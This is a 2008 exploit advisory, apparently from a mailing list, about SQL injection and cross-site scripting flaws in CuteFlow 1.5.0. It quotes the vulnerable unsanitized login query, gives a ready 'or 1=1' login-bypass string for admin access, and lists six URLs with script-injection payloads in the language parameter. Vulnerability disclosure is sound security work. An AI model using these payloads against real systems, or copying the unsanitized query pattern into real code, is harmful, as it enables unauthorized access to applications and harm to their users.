CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

Sat, 29 Mar 2008 10:02:16 -0700 

             
########################################################################

             #                                                                  
    #

             #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities       
    #

             #                      [sql injection & Xss]                       
                #

             
########################################################################


Virangar Security Team


www.virangar.org

www.virangar.net


--------

Discoverd By : hadihadi 


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all iranian hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)


sql vuln code in login.php:


$query = "select * from cf_user where strPassword = '$strMd5Password' AND 
strUserId = '".$_REQUEST["UserId"]."'";


 -----------------------

 the login forme included in index.php you must login in index.php ;)

vuln:

login:admin ' or 1=1/*

password:whatever

-------------------------------------

and you can see xss vuln too here:


/page/showcirculation.php?language=<script>alert(1111)</script>

/pages/edittemplate_step2.php?language=<script>alert(1111)</script>

/pages/showfields.php?language=<script>alert(1111)</script>>

/pages/showuser.php?language=<script>alert(1111)</script>

/pages/editmailinglist_step1.php?language=<script>alert(222)</script>

/pages/showtemplates.php?language=<script>alert(1111)</script>

-------------------------

tnx all h4ck3rz

Reply via email to